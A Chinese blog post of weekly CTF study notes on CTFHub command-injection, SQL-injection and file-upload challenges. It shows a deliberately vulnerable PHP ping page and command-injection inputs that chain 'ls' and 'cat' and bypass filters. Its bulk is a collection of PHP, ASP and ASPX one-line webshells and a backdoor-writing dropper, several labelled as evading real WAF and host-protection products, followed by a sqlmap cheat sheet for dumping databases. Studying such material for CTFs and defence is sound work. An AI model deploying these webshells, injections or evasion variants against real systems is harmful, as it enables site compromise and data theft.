本周学习的主要内容有 ctfhub 刷题
本周因为各种事情有点多,所以没有做很多题
再加上ctfhub的大部分简单的题也就做的差不多了,所以之后的一些题可能对我来说就会是一个瓶颈吧
所以即将开始下一波理论学习
首先要吐槽一个地方
之前用的exe版的sqlmap 也不知道是版本太老 还是效率的问题 既然连爆表都报不出来 更别说–dump了,一直以为是自己的语法有问题,在这里浪费了很多时间
另外有一个绿色版本的sqlmap(附带操作面板),也有一点点问题,所以暂时还未投入使用。
另外密码那一块 带验证码的破解真的搞不出来了,只有rce和sql注入和文件上传上有所学习
一 rce
目前对这个版块还缺乏系统认知,有待学习
但从题目来看 都是 调用命令提示符(本意是使用ping命令测网) 但是这里就可以使用一些方式除了ping之外 另外使用命令提示符进行一些操作来达成目的
目前主要是两种思路
1嵌入一句话木马 用菜刀进行连接
2直接上代码 完成操作
如果从长远来看,一句话 木马肯定是最优选择,但是因为题目主要是拿flag,所以直接使用代码也未尝不可。
和xss类似,rce也主要是考一些如何突破过滤措施
比如过滤 cat 空格 目录分割符 运算符 等等
例题是 最简单的 注入 无任何过滤 这个时候
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
$cmd = "ping -c 4 {$_GET['ip']}";
exec($cmd, $res);
}
?>
<!DOCTYPE html>
<html>
<head>
<title>CTFHub 命令注入-无过滤</title>
</head>
<body>
<h1>CTFHub 命令注入-无过滤</h1>
<form action="#" method="GET">
<label for="ip">IP : </label><br>
<input type="text" id="ip" name="ip">
<input type="submit" value="Ping">
</form>
<hr>
<pre>
<?php
if ($res) {
print_r($res);
}
?>
</pre>
<?php
show_source(__FILE__);
?>
</body>
</html>
用一句话木马或者cat抓取都可以
比如
127.0.0.1||《一句话木马》
但是 这里还是要手动学一点点东西,所以使用直接抓取
127.0.0.1||ls 可以看到所有文件
再用127.0.0.1||cat< 抓取即可
这个时候,系统会提示执行了两个命令 但是第二号命令也就是cat不会直接表现出来
需要在源代码中查看
成功拿到flag
再是过滤cat的情况,此时偷懒的方法就是上一句话木马喽,但是我们还是可以换一种方法进行
思路:代替cat
cat 由第一行开始显示内容,并将所有内容输出
tac 从最后一行倒序显示内容,并将所有内容输出
more 根据窗口大小,一页一页的现实文件内容
less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head 只显示头几行
tail 只显示最后几行
nl 类似于cat -n,显示时输出行号
tailf 类似于tail -f
3过滤空格
代替空格就好了
127.0.0.1;cat${IFS} 就可以了
其实还有一些方法,但是有待系统学习 其实一句话木马也是不错的选择,原版一句话木马确实很容易被过滤 但是有一些一句话木马 很难被发现,所以有时候只你记住这一个木马,就可以做类似的题用着一个方法就可以了
比如
asp一句话木马:<%eval request("x")%>
php一句话木马:<?php eval($_POST[g]);?>
aspx一句话:<%@ Page Language="Jscript"%><%eval(Request.Item["x"],"unsafe");%>
数据库加密一句话(密码a):┼攠數畣整爠煥敵瑳∨≡┩愾
网站配置、版权信息专用一句话:"%><%Eval Request(x)%>
一句话再过护卫神:<%Y=request("x")%> <%execute(Y)%>
过拦截一句话木马:<% eXEcGlOBaL ReQuEsT("x") %>
asp闭合型一句话 %><%eval request("0o1Znz1ow")%><%
能过安全狗的解析格式:;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg
突破安全狗的一句话:<%Y=request("x")%> <%eval(Y)%>
elong过安全狗的php一句话:<?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST[cc]); ?>
后台常用写入php一句话(密码x):
<?
$fp = @fopen("c.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[x])'."\r\n\r\n?".">\r\n");
@fclose($fp);
?>
高强度php一句话:
<?php substr(md5($_REQUEST['heroes']),28)=='acd0'&&eval($_REQUEST['c']);?>
新型变异PHP一句话(密码b4dboy):
($b4dboy = $_POST['b4dboy']) && @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’);
突破安全狗的aspx一句话:
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
突破护卫神,保护盾一句话:
<?php $a = str_replace(x,"","axsxxsxexrxxt");
$a($_POST["test"]); ?>
许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传,这样一句话木马就写入不进数据库了。
改成:〈scriptlanguage=VBScript runat=server〉execute request("l")〈/Script〉
这样就避开了使用〈%%〉,保存为.ASP,程序照样执行的效果是一样的。
PHP高强度一句话:
<?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['c']);?> 菜刀连接:/x.php?x=lostwolf 脚本类型:php 密码:c
<?php assert($_REQUEST["c"]);?> 菜刀连接 躲避检测 密码:c
```在网上找的一些可以用的木马
对这种放水题基本上是通杀的
sql注入
从一开始的墨者学院再到现在的ctfhub
sqlmap的题基本上就是这几道,手动跑确实可以,但是emmmm索性还是用的sqlmap 因为题都差不多,也没什么好讲的
无外乎
-u --dbs _-current-db -D --tables -T --dump
这方面的建议就是及时更新sqlmap!!!!!!!!!!!
不然有时候跑起来真的扎心!!!
sqlmap.py -u url --dbs //爆数据库
sqlmap.py -u url --current-db //爆当前库
sqlmap.py -u url --current-user //爆当前用户
sqlmap.py -u url --users 查看用户权限
sqlmap.py -u url --tables -D 数据库 //爆表段
sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段
sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解
sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段
文件上传
目前开启的环境并不多,前段验证 要么用火狐浏览器关js 要么用bp抓包改包,这个在前几期已经有所叙述,就不在详解了
包括图片木马,有时候会抽取图片里面的部分进行解析,如果发现有非法代码,就删除文件在,这种还是用记事本打开图片,做手脚。
有趣的有mime 绕过
很多时候,这种例题的文件上传路径也是可以随意创建的,利用这一点,也可以做手脚。
下个星期要好好学一下rce的基础 和 文件上传拓展和破解密码的题了。
扫一扫
470
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
